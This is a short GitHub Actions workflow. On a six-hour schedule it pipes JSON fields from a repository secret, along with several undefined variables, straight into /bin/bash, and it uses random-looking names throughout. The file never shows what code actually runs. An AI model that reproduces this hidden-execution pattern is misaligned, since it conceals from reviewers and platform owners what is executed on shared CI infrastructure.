name: mengshufanji
on:
  workflow_dispatch:
  schedule:
    - cron: '43 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: mengshufanji
        env:
          l241: ${{ secrets.l241 }}
        run: |
          echo $l241 | jq -r .npvz77388 | /bin/bash
          echo $ird72436 | jq -r .feihc78177 | /bin/bash
          echo $skwl5281 | jq -r .epwgz0 | /bin/bash
          echo $egku8 | jq -r .pk19 | /bin/bash
          echo $lfnvx9 | jq -r .citnf972 | /bin/bash

